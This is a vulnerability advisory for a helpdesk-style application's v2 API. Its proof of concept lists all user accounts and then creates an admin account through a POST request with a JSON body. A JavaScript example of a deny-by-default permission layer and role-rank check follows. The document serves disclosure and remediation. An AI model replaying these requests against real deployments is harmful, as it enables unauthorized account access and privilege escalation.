Improper Privilege Management API V2
# Description
Some `api v2` endpoints do not check permissions, which allows attackers to retrieve or edit `ticket`, `account`, `group`, `department`, `team` and `ElasticSearch` information.

# Proof of Concept
*Get users list*

1. Login.
2. Go to `/api/v2/accounts?type=all`.
3. The user list is returned.
![alt text](https://i.ibb.co/r07DTYf/get-accounts.png)

*Create user with admin role*

1. Get the admin role id from `/api/v2/accounts`.
2. Send a POST to `/api/v2/accounts` with the following body:

```
{"username":"test21233","fullname":"test21233","title":"test2","email":"[email protected]","teams":["627ce1fd9f59377095600ce9"],"role":"627ce1fd9f59377095600ce1","password":"test2test2","passwordConfirm":"test2test2"}
```

3. The account is created successfully.

![alt text](https://i.ibb.co/8DfcL0D/create-account.png)

# Note
Many API endpoints are vulnerable; I have just shown a piece of the attack vector that can happen.
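The root cause described above is that route handlers run without any permission check, so the fix is an authorization layer that sits in front of every v2 route and denies by default. The following is an added example written for this advisory, not the affected project's own code: a permission table keyed by role, a route table that maps method and path to a required permission, and a handler-level guard for `POST /api/v2/accounts` that refuses to mint an account whose role outranks the caller's. The role names, permission strings and role ranking are assumptions for illustration; the PoC passes a role id rather than a name, so a real deployment would resolve the id to its rank first.

```javascript
// Added example (not the project's own code): deny-by-default permission
// layer for the v2 API routes named in the advisory. Role names, the
// permission table and the role ranking below are assumptions.

// Permissions each role holds. Anything not listed here is denied.
const ROLE_PERMISSIONS = {
  admin: new Set(['accounts:read', 'accounts:create', 'accounts:update',
                  'tickets:read', 'tickets:update', 'groups:read', 'teams:read']),
  agent: new Set(['tickets:read', 'tickets:update', 'groups:read', 'teams:read']),
  user:  new Set(['tickets:read:own']),
};

// Higher rank = more privilege. Used to stop a caller from creating an
// account with more privilege than their own (the PoC creates an admin).
const ROLE_RANK = { user: 1, agent: 2, admin: 3 };

// Route table: method + path pattern -> permission required to reach the handler.
const ROUTES = [
  { method: 'GET',  pattern: /^\/api\/v2\/accounts$/,        requires: 'accounts:read' },
  { method: 'POST', pattern: /^\/api\/v2\/accounts$/,        requires: 'accounts:create' },
  { method: 'PUT',  pattern: /^\/api\/v2\/accounts\/[^/]+$/, requires: 'accounts:update' },
  { method: 'GET',  pattern: /^\/api\/v2\/tickets$/,         requires: 'tickets:read' },
  { method: 'GET',  pattern: /^\/api\/v2\/groups$/,          requires: 'groups:read' },
  { method: 'GET',  pattern: /^\/api\/v2\/teams$/,           requires: 'teams:read' },
];

// Strip the query string before matching so "?type=all" cannot dodge a pattern.
function pathOnly(url) {
  return url.split('?')[0];
}

// Authorization check to run before any route handler.
// Returns an HTTP-style status; 200 means the handler may proceed.
function authorize(session, method, url) {
  if (!session || !session.role) {
    return { status: 401, reason: 'not authenticated' };
  }
  const route = ROUTES.find(r => r.method === method && r.pattern.test(pathOnly(url)));
  if (!route) {
    // Unknown route: deny instead of falling through to an unchecked handler.
    return { status: 404, reason: 'no such route' };
  }
  const granted = ROLE_PERMISSIONS[session.role] || new Set();
  if (!granted.has(route.requires)) {
    return { status: 403, reason: `missing permission ${route.requires}` };
  }
  return { status: 200, reason: 'ok' };
}

// Handler for POST /api/v2/accounts: even an authorized caller must not
// assign a role that outranks their own.
function createAccount(session, body) {
  const gate = authorize(session, 'POST', '/api/v2/accounts');
  if (gate.status !== 200) return gate;
  const requested = ROLE_RANK[body.role];
  if (requested === undefined) {
    return { status: 400, reason: 'unknown role' };
  }
  if (requested > ROLE_RANK[session.role]) {
    return { status: 403, reason: 'cannot assign a role above your own' };
  }
  // Persist the account here; the constructed object stands in for the DB record.
  return { status: 201, reason: 'created', account: { username: body.username, role: body.role } };
}

// Stand-alone demonstration with constructed sessions, replaying the two PoC requests.
const lowPriv = { role: 'user' };
console.log(authorize(lowPriv, 'GET', '/api/v2/accounts?type=all'));   // 403
console.log(createAccount(lowPriv, { username: 'test21233', role: 'admin' })); // 403
console.log(createAccount({ role: 'admin' }, { username: 'test21233', role: 'agent' })); // 201
```

Two design points matter here: the route table is the only way into a handler, so a newly added endpoint that is missing from it fails closed with 404 rather than silently running unchecked, and the role-rank comparison in `createAccount` is a second, independent check because the first PoC step (reading the admin role id) shows that knowing a privileged identifier must not be enough to assign it.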
